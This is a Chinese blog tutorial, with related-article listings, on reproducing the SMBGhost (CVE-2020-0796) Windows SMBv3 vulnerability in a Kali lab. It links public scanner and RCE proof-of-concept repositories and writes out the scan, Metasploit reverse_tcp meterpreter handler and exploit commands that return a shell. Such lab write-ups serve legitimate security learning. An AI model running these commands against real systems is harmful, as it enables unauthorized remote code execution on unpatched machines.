kali复现CVE-2020-0796 永恒之黑

最新推荐文章于 2024-05-16 02:53:30 发布
最新推荐文章于 2024-05-16 02:53:30 发布
阅读量4k 收藏 46
点赞数 3
文章标签: 安全 web安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57856283/article/details/123454404
版权
本文详细介绍了SMBv3的'永恒之黑'漏洞(CVE-2020-0796),该漏洞可能导致远程代码执行。受影响的Windows 10和Server版本被列出。通过提供PoC测试和攻击载荷模块的步骤,展示了如何检测和利用此漏洞。
摘要由CSDN通过智能技术生成

3.1 永恒之黑简介

2017 年,永恒之蓝,3 年之后,永恒之黑来了;

 

 

介绍:3 月 12 日,

微软披露了一个最新的 SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗 称永恒之黑

 

 

本漏洞源于 SMBv3 没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击 SMB 服务端远程执行任意恶意代码,亦可通过构建恶意 SMB 服务端诱导客户端连接从而大规模攻击客户端。永恒 之黑一旦被成功利用,其危害不亚于永恒之蓝。

 

 

3.2 漏洞影响范围

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for x64-based Systems

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

 

3.3 环境准备:

攻击机:kali 系统

目标及:Windows 10 Version 1903 for x64-based Systems

3.4 实战 cve-2020-0796(永恒之黑)

下载地址:

https://github.com/ollypwn/SMBGhost

辅助验证目标环境是否存在漏洞

https://github.com/chompie1337/SMBGhost_RCE_PoC

攻击载荷模块

首先先测试目标环境是否有该漏洞,我们用第一个 poc 测试一下:

解压这个包

接下来我们cd到这个文件夹里

cd SMBGhost-master

接下来我们来扫描看看到底有没有那个漏洞呢

 python3 scanner.py 192.168.179.132

他是有的

然后我们在解压另外一个包,并查看

1、切换到 exp 攻击测试模块

2.重新生成pload

exploit.py 原文件不能直接用来攻击,需要修改其中的 USER_PAYLOAD 部分;

1、 打开 MSF 监听模块

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.134

msf5 exploit(multi/handler) > set lport 9999

2、 开始攻击

root@piloteer-101:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.179.132

此处按下回车,即可获得 shell

深渊山谷
关注
  • 3
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
永恒复现(CVE-2020-0796)
weixin_45006525的博客
06-04 1937
漏洞环境虚拟机搭建:迅雷下载 ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/ 适用windows10版本: 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于x64的系统) Windows 10 1903版(用于基于ARM64的系统) Windows Server
cve-2020-1350:Bash概念验证(PoC)脚本可利用SIGRed(CVE-2020-1350)。 在运行Windows Server 2003直至Windows Server 2019的域控制器上实现域管理
04-13
cve-2020-1350 Bash概念验证(PoC)脚本可利用SIGRed(CVE-2020-1350)。 在运行Windows Server 2003直至Windows Server 2019的域控制器上实现Domain Admin。 ================================================== =...
windows10永恒CVE-2020-0796)漏洞复现
2301_81305520的博客
03-07 1908
windows10永恒CVE-2020-0796)漏洞复现
2024年最新网络安全学习day6——永恒漏洞复现,2024年最新下血本买的
最新发布
2401_84968612的博客
05-16 813
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
kali永恒
weixin_43585088的博客
06-07 5455
CVE-2020-07961 目标主机2 漏洞检测3 准备一下如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 永恒 CVE-2020-0796复现 1 目标主机 1.1 目标主机开放445端口 1.2 可以ping通,这里需要目标主机关闭防火墙或者修改策略了 1.2
永恒复现
qq_67181251的博客
05-07 2071
二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞(CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞(CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。栈溢出漏洞(Stack-Overflow)堆溢出漏洞(Heap-Overflow)释放后重引用漏洞(Use-After-Free)
Kali:简单实现永恒复现,漏洞CVE-2020-0796
2201_75638644的博客
03-12 1261
Kali:简单实现永恒复现,漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
          永恒漏洞复现
Zhaokangkang123的博客
02-15 615
永恒漏洞复现
Kali-Linux-2020.4-vmware-amd64.vmx
07-18
Kali-Linux-2020.4-vmware-amd64.vmx
kali-linux-2020.4-vmware-amd64.7z.torrent
07-12
kali-linux下载
kali-linux-2020.4-installer-amd64 镜像
11-26
kali-linux-2020.4-installer-amd64 镜像,直接下载即可 正常下载很慢,并且容易中断,这是2020年11月25号下载的最新镜像文件
Windows 10 永恒CVE-2020-0796复现过程 完整版
热门推荐
PigLL的博客
08-15 1万+
实验环境 目标机:Windows 10(CVE-2020-0796漏洞版) 攻击机:Kali 实验环境均在虚拟机中进行,模式为NAT模式,使他们处于同一网段中。 1.首先关闭windows 10 更新服务和防火墙 开始菜单–设置–更新与安全 然后右键我的电脑–服务–找到Windows update–选择禁用 之后点击开始菜单–设置–Windows安全中心 把下面选项全部关闭 2.开启Admintrator账户 右键我的电脑–管理–本地用户和组–用户–双击administrator–把账户已禁用勾掉
永恒 漏洞复现
lianliandad的博客
11-01 914
好好学习
windows10 永恒复现CVE-2020-0796
qq_53579360的博客
11-13 1498
永恒复现
Win10-永恒漏洞复现
网安小白的博客
09-19 2830
win10永恒漏洞复现,图文详解
CVE-2020-0796永恒漏洞复现
Martin-share的博客
02-15 919
2020年3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒一旦被成功利用,其危害不亚于永恒之蓝。受影响版本:set lhost。
CVE-2020-0796 WIN10 永恒漏洞复现
干铮的博客
08-14 1600
1.禁用windows update 2.关闭windows防火墙 3.主机发现 Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段 4.用msfvenom生成python类型的shellcode 5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的 6.MSF监听4444端口 use exploit/multi/handler set payload windows/x64...
CVE-2020-0976永恒漏洞复现
qq_36918532的博客
03-13 4040
漏洞原理 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 影响版本 Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标 漏洞所需工具 漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值